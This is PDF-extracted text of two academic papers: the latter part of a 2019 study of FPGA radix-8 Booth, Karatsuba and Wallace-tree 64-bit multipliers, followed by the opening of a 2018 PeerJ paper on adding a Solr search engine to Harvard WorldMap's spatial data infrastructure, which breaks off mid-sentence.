Radix-8 booth multiplier is shown in Fig. 8. The use of CSA provides very powerful performance with limited area cost. The partial products for radix-2 is n (where n is the number of operand bits). However, for radix 8 the number of partial products is only n/3. TABLE I. RADIX-8 BOOTH ENCODING. Inputs (bits of M-bit multiplier) Partial Product PPRi 0 0 0 0 0 0 0 0 1 A 0 0 1 0 A 0 0 1 1 2A 0 1 0 0 2A 0 1 0 1 3A 0 1 1 0 3A 0 1 1 1 4A 1 0 0 0 -4A 1 0 0 1 -3A 1 0 1 0 -3A 1 0 1 1 -2A 1 1 0 0 -2A 1 1 0 1 -A 1 1 1 0 -A 1 1 1 1 0 As can be seen from fig.8, the multiplier accepts two 32-bit operands ( and ) and stores the operand ( ) in a shift register to select the group bits used in encoding whereas the operand ( ) processed with the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 21 booth encoder. The output of encoding stage is added via the sequential CSA adder and the result is provided in a redundant representation (vector sum and vector carry). Radix-8 Booth Encoder X Shift Register A CSA_64bit Partial SumPartial Carry 6464 64 32 3 32 Figure 8. Design of Radix-8 Booth 32-bit multiplier Reset Mul_Gen CSA Store Data Output Start Enable i<=11 i>11 Figure 9. State machine diagram for 32-bit Booth multiplier. Also, Fig.9 illustrates the FSM diagram of 32-bit booth multiplier. It starts with Reset_State, where all signals and variables are cleared (i.e. reset). Next state is Mul_Gen, where encoding is occurred. After that, the generated vector is added to the previous results of CSA state. Fourth, results are stored in Store_State and moves back to Mul_Gen state in loop until all the bits are selected and encoded. Finally, the output results are provided in Output state.Note that in Radix-8 encoding the number of generated partial product vectors are computed by dividing the number of bits over 3, since each three bits are selected and used for encoding. B. CSA Based Radix-8 Booth, Wallace Tree Karatsuba Multiplier In this method, we combine the benefits of the bit reduction of radix 8 booth along with the parallelism of CSA based Wallace tree as well as the pipelining process of Karatsuba multiplication. Thus, this design achieved minimum path delay and minimized area (i.e. the best performance). However, redundancy in this design produced one critical problem regarding the middle carry at the edges of blocks that affects the results. Fig.10 illustrates the flow diagram for this design. Here, we first designed a 64-bit Karatsuba Multiplier using a 32-bit CSA based radix-8 Booth for partial products calculation (as for our target design and since we are implementing 64-bit multiplier; m was chosen to be 32 bits (half size)). First, the entered two operands are divided into halves . Next, they are fed into the Booth multiplier to compute the partial products as given in Karatsuba formula. Since the results are redundant and we have 5 partial products according to Karatsuba: . Thus, 10 partial products are generated. In the final stage, a CSA based Wallace tree was implemented to be used for adding the resulted partial products. Final result is represented redundantly as vector sum and vector carry. This design achieves minimum path delay with limited area. However, redundancy in this design produces one critical problem that affects the results. As a rule-of- thumb, if we multiply two numbers (i.e. p and q), the multiplication result will be increased to . However, this is not the case when using redundant systems since the result is stored as two vectors and adding the two vectors to we tend to obtain the conventional product might result in . This additional bit brings up a new problem in the preliminary design. Now, this problem can be solved by discarding the last carry when converting back to conventional representation. However, in Karatsuba algorithm the numbers are split into 32-bit (original size is 64). The result must be 128- bit, but in Karatsuba case will be 10 partial product vectors of 64-bit shifted in such a way that adding those vectors will result in 128-bit. Thus, discarding all the generated carry when converting back to conventional system leads to error since only the carry generated of adding the two vectors corresponding to International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 22 the same variable (or the same partial product in this case) needs to be discarded. Other generated carries must be considered. Fig.11. demonstrate this problem graphically. Generate Karatsuba operands 32 bit Rad.8 Booth Multiplication Four Levels CSA Tree Input Two 64 Bit operands Output 128 Bit Sum and Carry Vectors 6 operands 32 Bit 8 Vectors 64 Bit Figure 10. Design of 64-bit CSA Based Radix-8 Booth, Wallace Tree Karatsuba multiplier. 32-bit Booth Radix-8 32-bit Booth Radix-8 32-bit Booth Radix-8 X=x1B+x2, 64-bit (32-bit each) Y=y1B+y2, 64-bit (32-bit each) x1 y1 x0 y0 (x1-x0) (y1-y0) ps1 pc1 ps2 pc2 ps3 pc3 B 2 (ps1, pc1) B(ps1, pc1) B(ps2, pc2) 1(ps2, pc2) B(ps3, pc3) Figure 11. Graphical approaches to demonstrate the carry error (the mid-carry problem), here we have two cases:Case I- ps1+ pc1 = might result in carry, result = 65-bit (wrong). Carry must be discarded and Case II- ps1+ ps2 = might result in carry, result = 65-bit (correct). Carry must be considered. Eventually, the mid-carry problem was solved by either using 64-bit CSA Based Radix-8 Booth, KSA Based Karatsuba multiplier or using 64-bit CSA Based Radix-8 Booth, with comparator Karatsuba multiplier. However, both solutions have added more overhead to design cost; therefore, this solution has been excluded. Both solutions are discussed in the following subsections. 1) CSA Based Radix-8 Booth, KSA Based Karatsuba Multiplier. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 23 Since the carry to be eliminated is the generated one from booth multiplier, a first thought is to exchange the CSA adder with KSA adder to convert back the two vectors into one 64-bit number and discard any generated carry. All the 8 vectors are reduced into five 64-bit vectors in parallel. This stage helps to eliminate the false carry without the need to do any further examination. KSA is a fast adder, thus this design maintains its high performance utilizing more logic elements. The logic diagram of the design is shown in Fig.12. 2) CSA Based Radix-8 Booth, With Comparator Karatsuba Multiplier. Another noticeable design option can solve the mid- carry problem is to use a 64-bit comparator to test if the two vectors will generate a carry if yes, then do the correction step before input the 10 vectors to CSA Tree. After Booth multiplication stage, connect the vector sum and vector carry that may produce carry error to the inputs of 64-Bit comparator unit, then perform correction if needed. Finally, all vectors added using CSA tree. The complete solution is depicted in fig.13. Generate Karatsuba operands 32 bit Rad.8 Booth Multiplication 64 Bit KSA Adder Input Two 64 Bit operands Output 128 Bit Sum and Carry Vectors Three Levels CSA Adder 6 operands 32 Bit 8 Vectors 64 Bit 5 Operands 64 Bit Figure 12. Design of 64-bit: 64-bit CSA Based Radix-8 Booth, KSA Based Karatsuba multiplier. Generate Karatsuba operands 32 bit Rad.8 Booth Multiplication 64 Bit Carry Generate and Kill Input Two 64 Bit operands 64 Bit Comparator Correction circuit Five Levels CSA Tree Output 128 Bit Sum and Carry Vectors 6 operands 32 Bit10 Vectors 64 Bit 10 Vectors 64 Bit 10 Vectors 64 Bit Figure 13. Karatsuba multiplication based on CSA and comparator. Note that the 64-bit comparator can be built with 8 stages in total recording a total delay of 13 level gate delay and area of 317 gates (like the design of 8-bit comparator discussed in section.2.5). To predict whether the carry will be generated or not, then we need to generate 64-Bit G (generate) and K (kill) vectors. Thus, we have three cases which might happen as follows:  Case I: when 0. The carry is propagated. Here we need to define the first carry state before . If the state is , then the vector does not need any correction. But, if the state is a state, then we need to subtract one from the highest bit (MSB) of any vector to prevent the carry to .  Case II:when . Here we have a state, so that no need to correction.  Case III:when .Here is a state and a correction is needed. If this happed at highest bit (MSB), then it needs to subtract 2 ones. But if it after some , then this is Case I. To define the first case, we have used a comparator to compare the two vectors as the comparator results:  : Generate state happened first or it is the first state after propagation  : kill state happened first or it is the first state after propagation International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 24  All states are propagating states, no need for correction because we do not have input carry 3) Comparisons between Design II & Design III We investigated both proposed design alternatives of Karatsuba based multiplication theoretically in terms of critical path delay (using gate delay unit) and the area of the multiplier (how many gates used in the implementation). The results are shown in table 2 below. TABLE II. COMPARISON BETWEEN DESIGN II & DESIGN III. Design Solutions # Delay (gate delay) % Optimization Area (# of gates) % Optimization Solution I: using KSA Adder. 23 +15% 6130 Solution II: using Comparator unit. 27 3712 +50% C. Sequential 64-Bit CSA Based Radix-8 Booth Multiplier This design is accomplished by expanding the 32- bit booth to 64-bit. The two modules (i.e. 64-bit and 32-bit Booth) differ only in the number of generated partial products. Since radix-8 is used, 22 partial products are generated in the new module instead of 11 while other logic components remained the same. Fig.14 shows the logic diagram of new 64-bit implementation. This design was implemented and was simulated on Altera FPGA Kit recording a path delay of 10.701 ns for one loop and since the program runs 22 times(i.e. 22 partial products), thus the total path delay is 235.422 nS. Also, this multiplier requires 3330 logic elements (LEs). Radix-8 Booth Encoder X Shift Register A CSA_64bit Partial SumPartial Curry 128128 128 64 3 64 Figure 14. Design of CSA based Radix-8 Booth 64-bit multiplier. IV. SYNTHESIZE RESULTS AND ANALYSIS To speed up the performance of sequential 64-Bit CSA Based Radix-8 Booth Multiplier, we parallelized the addition of partial products produced in the same level by using Wallace CSA tree instead of sequential CSA to exploit the maximum possible parallelism between the partial products to gain in speed and enhance the design performance. That’s it, we end up with implementing a 64-bit Wallace Tree CSA based Radix-8 Booth multiplier (WCBM). The block diagram for the proposed design is shown in Fig.15. (a). The comparison with the other design alternatives showed that Wallace Tree CSA Based Radix-8 Booth Multiplier (WCBM) has decreased the total delay and increased the operational speed for the multiplication operation. Also, the design is modified to increase the frequency be dividing the program to three main states. The top view of our implemented WCBM unit is given in Fig.15. (b). It’s clearly seen that WCBM unit is triggered by CLK signal along with enable line. The generated number can be obtained from the output portliness “sum” which is 128 bits. Besides the unit encompasses three control input signals (enable, reset, clk) and two control output signals (Ack and Ready). Moreover, the finite state machine (FSM) diagram for the implemented WCBM is shown in Fig.15. (c). FSM consists of three main phases: Partial product generation (Initially, 22 partial products are generated by using radix-8 Booth encoding), Wallace tree phase (these partial products are added by using 7 levels Wallace Tree CSA based) and KSA phase (because the result is redundant, KSA is used in the last phase to convert it to conventional result). Finally, Fig.16. Illustrates a sample numerical example of the proposed WCBM that is generated from Quartus II simulation tool. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 25 Generate Booth Partial Products CSA Tree (7 Levels) Input Two 64 Bit operands Output 128 Bit Sum and Carry Vectors 22 PP 128 Bit 2 Vectors 128 Bit Figure 15. (a) Design Architecture of WCBM (a) Top Level DiagramWCBM (C) FSM Diagram for WCBM. Figure 16. Sample run example of WCBM process of two 64-bit numbers International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 26 The proposed multiplier implementation has been synthesized using Altera Cyclone EP4CGX-22CF19C7 FPGA kit to analyze several design factors such as design area, the total delay of the multiplication unit and the thermal power consumption of FPGA implementation. We have evaluated the performance of the 64-bit Wallace Tree CSA based Radix-8 Booth multiplier WCBM module for different data path sizes. Timing analysis of the critical clock cycle for the implemented WCBM is illustrated in Fig.17. It can be seen from the graph that the critical path delay is 14.103 ns in which 3.094 ns for the clock delay and 11.009 ns for the data delay. This give a maximum frequency for the circuit of 90.83 MHz.In addition, the area of the design has recorded a constant number of logic elements (i.e. 14249 LEs) with the total thermal power dissipation estimated by using PowerPlay Power analyzer tool of Quartus II software of 217.56 mW. Figure 17. Waveform sample of the proposed WCBM data delay V. CONCLUSIONS AND REMARKS Multiplication operation is a core operation that domineer the performance of several public cryptographic algorithms such as RSA and SSC. In this paper, we have thoroughly discussed several design alternatives of radix-8 based multiplier unit by employing the Karatsuba method and Booth recording method with carry save and Kogge stone adders on Wallace tree organization. The proposed designs were evaluated in terms of many aspects including: maximum frequency and critical path delay, design area, and the total FPGA power consumption. The proposed hardware cryptosystem design is conducted using Altera Cyclone FPGA design technology along with the help of CAD package of Altera such as Quartus II and Modelsim 10.1. To sum up, we have successfully implemented and synthesized the Wallace Tree CSA Based Radix-8 Booth Multiplier (WCBM) module via the target FPGA technology for 64-bits. The synthesizer results showed an attractive results in terms of several design factors that can improve the computation performance for many multiplication based applications. REFERENCES [1] A.J. Menezes, P.C. Van Oorschot and S.A. Vanstone. (1996). Handbook of Applied Cryptography”, CRC Press, Boca Raton, Florida. [2] K. Javeed, X. Wang and M. Wang, 'Serial and Parallel Interleaved Modular Multiplierson FPGA Platform', IEEE 25th International Conference on Field Programmable Logic and Applications (FPL), 2015 https://doi.org/10.1109/FPL.2015.7293986 [3] D. J Greaves, System on Chip Design and Modelling, University of Cambridge, Computer Laboratory, Lecture Notes, 2011. http://www.cl.cam.ac.uk/teaching/1011/SysOnChip/socdam- notes1011.pdf. [4] M. D. Ercegovac and T. Lang, (2004) 'Digital Arithmetic', Morgan Kaufmann Publishers, Elsevier, vol.1, p.p.51-136. http://www.sciencedirect.com/science/book/9781558607989 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 27 [5] Qasem Abu Al-Haija, Sharifah M. S. Ahmad, "Fast Radix-2 Sequential Multiplier Using Kintex-7 FPGA Chip Family", The Open Cybernetics & Systemics Journal, Bentham Open, Vol. 12, 2018. [6] Mohammed Mosab Asad, Ibrahim Marouf, Qasem Abu Al-Haija, "Review Of Fast Multiplication Algorithms For Embedded Systems Design", International Journal Of Scientific & Technology Research Volume 6, Issue 08, 2017. [7] Heath, Steve (2003). Embedded systems design. EDN series for design engineers (2 ed.). Newnes. p. 2. ISBN 978-0-7506-5546-0. An embedded system is a microprocessor based system that is built to control a function or a range of functions. [8] I. Marouf, M. M. Asad, A. Bakhuraibah and Q. A. Al-Haija, "Cost analysis study of variable parallel prefix adders using altera cyclone IV FPGA kit," 2017 International Conference on Electrical and Computing Technologies and Applications (ICECTA), Ras Al Khaimah, 2017, pp. 1-4.doi: 10.1109/ICECTA.2017.8252011 [9] Altera Co., “Introduction to Quartus II Software: Ver 10.0”, Intel Quartus II MNL-01055-1.0, 2012. [10] Altera Corporation, “Cyclone IV Device Handbook”, Vol. 1, CYIV- 5V1-2.2, https://www.altera.com/, 2012. [11] S. Butchibabu, S. Kishore Bab (2014). Design and Implementation of Efficient Parallel Prefix Adders on FPGA, International Journal of Engineering Research & Technology, Vol. 3 Issue No.7. [12] B. Parhami, (1999), “Computer Arithmetic: Algorithms and Hardware Designs”, Oxford University Press, Oxford. [13] D. Purohit, H. Joshi, (2014), ‘Comparative Study and Analysis of Fast Multipliers’, International Journal of Engineering and Technical Research (IJETR), Vol. 2, No.7, 2014. [14] A. Karatsuba and Y. Ofman, (1963) ‘Multiplication of Multidigit Numbers on Automata’, Soviet Physics, Doklady, p.p.595-596. https://www.researchgate.net/publication/234346907_Multiplication_ of_Multidigit_Numbers_on_Automata [15] Qasem Abu Al-Haija, Mohamad M.Asad, Ibrahim Marouf,"A Systematic Expository Review of Schmidt-Samoa Cryptosystem", International Journal of Mathematical Sciences and Computing(IJMSC), Vol.4, No.2, pp.12-21, 2018.DOI: 10.5815/ijmsc.2018.02.02 [16] Qasem Abu Al-Haija, Mahmoud Smadi, Monther Al-Ja’fari, Abdullah Al-Shua’ibi, "Efficient FPGA implementation of RSA coprocessor using scalable modules", Procedia Computer Science, Elsevier, Vol 34, 2014. [17] Qasem Abu Al-Haija, Mohammad Alkhatib, Azmi B Jaafar, "Choices on Designing GF(P) Elliptic Curve Coprocessor Benefiting from Mapping Homogeneous Curves in Parallel Multiplications", International Journal on Computer Science and Engineering, Engg Journals Publications, Vol. 3, No. 2, 2011. work_2ha3mubt3zcffhnqhokzofd3ai ---- Enhancing discovery in spatial data infrastructures using a search engine Enhancing discovery in spatial data infrastructures using a search engine Paolo Corti1, Athanasios Tom Kralidis2 and Benjamin Lewis1 1 Center for Geographic Analysis, Harvard University, Cambridge, MA, USA 2 Open Source Geospatial Foundation, Beaverton, OR, USA ABSTRACT A spatial data infrastructure (SDI) is a framework of geospatial data, metadata, users and tools intended to provide an efficient and flexible way to use spatial information. One of the key software components of an SDI is the catalogue service which is needed to discover, query and manage the metadata. Catalogue services in an SDI are typically based on the Open Geospatial Consortium (OGC) Catalogue Service for the Web (CSW) standard which defines common interfaces for accessing the metadata information. A search engine is a software system capable of supporting fast and reliable search, which may use ‘any means necessary’ to get users to the resources they need quickly and efficiently. These techniques may include full text search, natural language processing, weighted results, fuzzy tolerance results, faceting, hit highlighting, recommendations and many others. In this paper we present an example of a search engine being added to an SDI to improve search against large collections of geospatial datasets. The Centre for Geographic Analysis (CGA) at Harvard University re-engineered the search component of its public domain SDI (Harvard WorldMap) which is based on the GeoNode platform. A search engine was added to the SDI stack to enhance the CSW catalogue discovery abilities. It is now possible to discover spatial datasets from metadata by using the standard search operations of the catalogue and to take advantage of the new abilities of the search engine, to return relevant and reliable content to SDI users. Subjects Human-Computer Interaction, Spatial and Geographic Information Systems Keywords Data discovery, Catalogue Service for the Web, Metadata, WorldMap, Geoportal, Search engine, Spatial Data Infrastructure, pycsw, Solr, GeoNode INTRODUCTION A spatial data infrastructure (SDI) typically stores a large collection of metadata. While the Open Geospatial Consortium (OGC) recommends the use of the catalogue service for the web (CSW) standard to query these metadata, several important benefits can be obtained by pairing the CSW with a search engine platform within the SDI software stack. SDI, interoperability, and standards An SDI is a framework of geospatial data, metadata, users and tools which provides a mechanism for publishing and updating geospatial information. An SDI provides the architectural underpinnings for the discovery, evaluation and use of geospatial information (Nebert, 2004; Goodchild, Fu & Rich, 2007; Masó, Pons & Zabala, 2012). SDIs are typically distributed in nature, and connected by disparate computing platforms and client/server design patterns. How to cite this article Corti et al. (2018), Enhancing discovery in spatial data infrastructures using a search engine. PeerJ Comput. Sci. 4:e152; DOI 10.7717/peerj-cs.152 Submitted 23 January 2018 Accepted 3 April 2018 Published 21 May 2018 Corresponding author Paolo Corti, pcorti@gmail.com Academic editor Alessandro Frigeri Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.152 Copyright 2018 Corti et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.152 mailto:pcorti@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.152 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ A critical principle of an SDI is interoperability which can be defined as the ability of a system or components in a system to provide information sharing and inter-application cooperative process control through a mutual understanding of request and response mechanisms embodied in standards. Standards (formal, de facto, community) provide three primary benefits for geospatial information: (a) portability: use and reuse of information and applications, (b) interoperability: multiple system information exchange and (c) maintainability: long term updating and effective use of a resource (Groot & McLaughlin, 2000). The OGC standards baseline has traditionally provided core standards definitions to major SDI activities. Along with other standards bodies (IETF, ISO, OASIS) and de facto/community efforts (Open Source Geospatial Foundation (OSGeo), etc.), OGC standards provide broadly accepted, mature specifications, profiles and best practices (Kralidis, 2009). Metadata search in an SDI and CSW An SDI can contain a large number of geospatial datasets which may grow in number over time. The difficulty of finding a needle in such a haystack means a more effective metadata search mechanism is called for. Metadata is data about data, describe the content, quality, condition and other characteristics of data in order to ease the search and understanding of data (Nogueras-Iso, Zarazaga-Soria & Muro-Medrano, 2005). Metadata standards define a way to provide homogeneous information about the identification, the extent, the spatial and temporal aspects, the content, the spatial reference, the portrayal, distribution and other properties of digital geographic data and services (ISO 19115-1: 2014, 2014). Ease of data discovery is a critical measure of the effectiveness of an SDI. The OGC CSW standard specify the interfaces and bindings, as well as a framework for defining the application profiles required to publish and access digital catalogues of metadata for geospatial data and services (Open Geospatial Consortium, 2016; Nebert, Whiteside & Vretanos, 2005; Rajabifard, Kalantari & Binns, 2009). Based on the Dublin Core metadata information model, CSW supports broad interoperability around discovering geospatial data and services spatially, non-spatially, temporally, and via keywords or free text. CSW supports application profiles which allow for information communities to constrain and/or extend the CSW specification to satisfy specific discovery requirements and to realize tighter coupling and integration of geospatial data and services. The CSW ISO Application Profile is an example of a standard for geospatial data search which follows ISO geospatial metadata standards. CSW catalogue within the SDI architecture In a typical SDI architecture the following components can be identified: � GIS clients: desktop GIS tools or web based viewers. � Spatial data server: returns geospatial data to map clients in a range of formats. � Cache data server: returns cached tiles to map clients to improve performance. � Processing server: responsible for the processing of the geospatial datasets. Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 2/15 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ � Spatial repository: a combination of a spatial database and file system, where the geospatial data is stored. � Catalogue server: used by map clients to query the metadata of the spatial datasets to support discovery. Desktop GIS clients generally access the SDI data directly from the spatial repository or the file system. When the user has appropriate permissions from these clients it is possible to perform advanced operations, which are generally faster than when performed over OGC web standards. Web based viewers access the SDI data served by the spatial data server using a number of OGC web standards over HTTP, typically WMS/WMTS/WMS-C when it is just needed to render the data, or WFS/WCS when it is needed to access to the native information respectively for vector or cover datasets. WFS-T can be used for editing vector datasets. Web viewers can run GIS SDI processes by using the WPS standard exposed by the processing server. All of these OGC standards can be used by desktop GIS clients as well. The spatial repository is generally a combination of a RDBMS with a spatial extension and the file system where are stored data which are not in the database. The catalogue, based on the CSW standard, lets users to discover data and services in an SDI. CSW is a standard for exposing a catalogue of geospatial entities over the HTTP request/response cycle. In a SDI or portal CSW endpoints are provided by a CSW catalogue. Popular open source implementations of CSW catalogue include (but are not limited to) pycsw (http://pycsw.org/), GeoNetwork (https://geonetwork-opensource.org/), degree (https://www.deegree.org/) and Esri Geoportal Server (https://www.esri.com/en-us/ arcgis/products/geoportal-server/overview). A CSW catalogue implements a number of operations which are accessible via HTTP. Some of these operations are optional: � GetCapabilities retrieves service metadata from the server. � DescribeRecord allows a client to discover the data model of a specific catalogue information model. � GetRecords searches for records using a series of criteria, which can be spatial, aspatial, logical, comparative. � GetRecordById retrieves metadata for one record (layer) of the catalogue by its id. � GetDomain (optional) retrieves runtime information about the range of values of a metadata record element or request parameter. � Harvest (optional) creates or updates metadata with a request to the server to ‘pull’ metadata from some endpoint. � Transaction (optional) creates or edits metadata with a request to the server. Need for a search engine within an SDI Search workflow and user experience are a vital part of modern web-based applications. Numerous types of web application, such as Content Management Systems (CMS), wikis, data delivery frameworks, all can benefit from improved data discovery. Same applies Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 3/15 http://pycsw.org/ https://geonetwork-opensource.org/ https://www.deegree.org/ https://www.esri.com/en-us/arcgis/products/geoportal-server/overview https://www.esri.com/en-us/arcgis/products/geoportal-server/overview http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ to SDI. Furthermore, in the Big Data era, more powerful mechanisms are needed to return relevant content to the users from very large collections of data (Tsinaraki & Schade, 2016). In the last few years, content-driven platforms have delegated the task of search optimization to specific frameworks known as search engines. Rather than implementing a custom search logic, these platforms now often add a search engine in the stack to improve search. Apache Solr (http://lucene.apache.org/solr/) and Elasticsearch (https:// www.elastic.co/), two popular open source search engine web platforms, both based on Apache Lucene (https://lucene.apache.org/), are commonly used in typical web application stacks to support complex search criteria, faceting, results highlighting, query spell-check, relevance tuning and more (Smiley et al., 2015). As for CMS’s, SDI search can dramatically benefit from such platforms as well. How a search engine works Typically the way a search engine works can be split into two distinct phases: indexing and searching. During the indexing phase, all of the documents (metadata, in the SDI context) that must be searched are scanned, and a list of search terms (an index) is built. For each search term, the index keeps track of the identifiers of the documents that contain the search term. During the searching phase only the index is looked at, and a list of the documents containing the given search term is quickly returned to the client. This indexed approach makes a search engine extremely fast in outputting results. On top of this, a search engine provides many other useful search related features, improving dramatically the experience of users. Improvements in an SDI with a search engine There are numerous opportunities to enhance the functionality of the CSW specification and subsequent server implementations by specifying standard search engine functionality as enhancements to the standard. A search engine is extremely fast and scalable: by building and maintaining its indexed structure of the content, it can return results much faster and scale much better than a traditional CSW based on a relational database. While a CSW can search metadata with a full text approach, with a search engine it is possible to extend the full text search with features such as language stemming, thesaurus and synonyms, hit highlighting, wild-card matches and other ‘fuzzy’ matching techniques. Another key advantage is that search engines can provide relevancy scores for likely matches, allowing for much finer tuning of search results. CSW does not easily emit facets or facet counts as part of search results. Search engine facets however, can be based on numerous classification schemes, such as named geography, date and time extent, keywords, etc. and can be used to enable interactive feedback mechanisms which help users define and refine their searches effectively. BACKGROUND Harvard WorldMap (http://worldmap.harvard.edu/) is an open source SDI and Geospatial Content Management System (GeoCMS) platform developed by the Centre for Geographic Analysis (CGA) to lower the barrier for scholars who wish to explore, visualize, edit and publish geospatial information (Guan et al., 2012). Registered users are Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 4/15 http://lucene.apache.org/solr/ https://www.elastic.co/ https://www.elastic.co/ https://lucene.apache.org/ http://worldmap.harvard.edu/ http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ able to upload geospatial content, in the form of vector or raster datasets (layers), and combine them with existing layers to create maps. Existing layers can be layers uploaded by other users and layers provided by external map services. WorldMap is a web application built on top of the GeoNode open source mapping platform (http://geonode.org/), and since 2010 has been used by more than 20,000 registered users to upload about 30,000 layers and to create some 5,000 web maps. Users can also access about 90,000 layers from remote map services based on OGC standards and Esri REST protocols. WorldMap is based on the following components, all open source and designed around OGC standards (Fig. 1): � A JavaScript web GIS client, GeoExplorer (http://suite.boundlessgeo.com/docs/latest/), based on OpenLayers (https://openlayers.org/) and ExtJS (https://www.sencha.com/ products/extjs/). Figure 1 The WorldMap SDI architecture. Full-size DOI: 10.7717/peerj-cs.152/fig-1 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 5/15 http://geonode.org/ http://suite.boundlessgeo.com/docs/latest/ https://openlayers.org/ https://www.sencha.com/products/extjs/ https://www.sencha.com/products/extjs/ http://dx.doi.org/10.7717/peerj-cs.152/fig-1 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ � A spatial data server based on GeoServer (http://geoserver.org/). � A cache data server based on GeoWebCache (http://geowebcache.org/). � A spatial database implemented with PostgreSQL (https://www.postgresql.org/) and PostGIS (https://postgis.net/). � A catalogue based on pycsw or GeoNetwork. � Aweb application, developed with Django (https://www.djangoproject.com/), a Python web framework, which orchestrates all of the previous components. WorldMap allows users to build maps using its internal catalogue of layers (local layers) combined with layers from external map services (remote layers), for a total of about 120,000 layers. WorldMap users can have trouble finding useful and reliable layers given the large number of them; a system was needed to enable fast, scalable search capable of returning the most reliable and useful layers within a large and heterogeneous collection. RESULTS AND DISCUSSION In 2015 CGA started the design and development of Hypermap Registry (Hypermap) (https://github.com/cga-harvard/Hypermap-Registry) to improve search for WorldMap users. Hypermap is an application that manages OGC web services (such as WMS, WMTS, CSW Capabilities service metadata) as well as Esri RESTendpoints. In addition it supports map service discovery (Chen et al., 2011), crawling (Bone et al., 2016; Li, Yang & Yang, 2010), harvesting and uptime statistics gathering for services and layers. One of the main purposes of Hypermap is to bring enhanced search engine capabilities into an SDI architecture. As it can be seen from the following Fig. 2, search engine documents, based on a provided schema, must be kept in synchrony with layer metadata stored in the GeoNode RDBMS. Hypermap is responsible for ensuring that the WorldMap search engine, based on Apache Solr, and the WorldMap catalogue RDBMS, based on PostgreSQL, are kept in sync. For example, when a WorldMap user updates the metadata information for one layer from the WorldMap metadata editing interface, that information is updated in the WorldMap pycsw backend, which is based on the RDBMS. As soon as this happens, a synchronization task is sent from Hypermap to the task queue. The task will be processed by the task queue, and all of the metadata information for the layer will be synced to the corresponding search engine document. Thanks to this synchronization mechanism, WorldMap users can search the existing layers metadata using a search engine rather than the OGC catalogue, enabling more flexible searches which filter on keywords, source, layer type, map extent and date range (Corti & Lewis, 2017). The results are returned by the search engine which returns a JSON response, and tabular in addition to spatial views (based on spatial facets) are returned to the browser (Fig. 2). WorldMap improvements with the search engine By pairing the CSW catalogue with a search engine, the metadata search in the WorldMap SDI yields several major benefits. Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 6/15 http://geoserver.org/ http://geowebcache.org/ https://www.postgresql.org/ https://postgis.net/ https://www.djangoproject.com/ https://github.com/cga-harvard/Hypermap-Registry http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Fast results By having the metadata content indexed in a search engine, metadata are returned very rapidly to the client. Because of its indexed documents nature, a search engine is much faster to return results when compared it with a relational database. Therefore, using a search engine in WorldMap search client makes things much faster than using a CSW catalogue based on a RDBMS. Scalability From a software engineering perspective, search engines are highly scalable and replicable, thanks to their shardable architecture. Such systems are capable of providing interactive query access to collections of spatio-temporal objects containing billions of features (Kakkar & Lewis, 2017; Kakkar et al., 2017). Clean API Query to the search engine API tends to be much simpler than XML queries to the CSW catalogue, specially when crafting advanced search requests (spatial, non-spatial, temporal, etc.). Same for output: JSON output from search engine API provides a more compact representation of search results enabling better performance and making the output more readable (Figs. 3 and 4). Figure 2 Metadata RDBMS to search engine synchronization in Harvard WorldMap. Full-size DOI: 10.7717/peerj-cs.152/fig-2 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 7/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-2 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Synonyms, text stemming Crucially, search engines are good at handling the ambiguities of natural languages, thanks to stop words (words filtered out during the processing of text), stemming (ability to detect words derived from a common root), synonyms detection and controlled vocabularies such as thesauri and taxonomies. It is possible to do phrase searches and proximity searches (search for a phrase containing two different words separated by a specified number of words). Because of features like these, keyword queries using the Hypermap search engine endpoint typically returns more results than an equivalent Figure 3 CSW request and response. Full-size DOI: 10.7717/peerj-cs.152/fig-3 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 8/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-3 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Figure 4 Search engine request and response. Full-size DOI: 10.7717/peerj-cs.152/fig-4 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 9/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-4 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ query using the Hypermap CSW. For example doing a full text search for the keyword ‘library’ returns more results from the search engine because it includes variations and synonyms of the original term like ‘libraries,’ ‘bibliotheca,’ ‘repository,’ ‘repositories’ in the returned results. Figure 5 Facets generate counts for metadata categories and geographic regions in a GeoCMS. Full-size DOI: 10.7717/peerj-cs.152/fig-5 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 10/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-5 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Relevancy Results can be ranked, providing a way to return results to users with the more relevant ones closer to the top. This is very useful to detect the most significative metadata for a given query. Weights can be assigned by specifying boosts (weighted factors) for each field. Facets Another important search engine 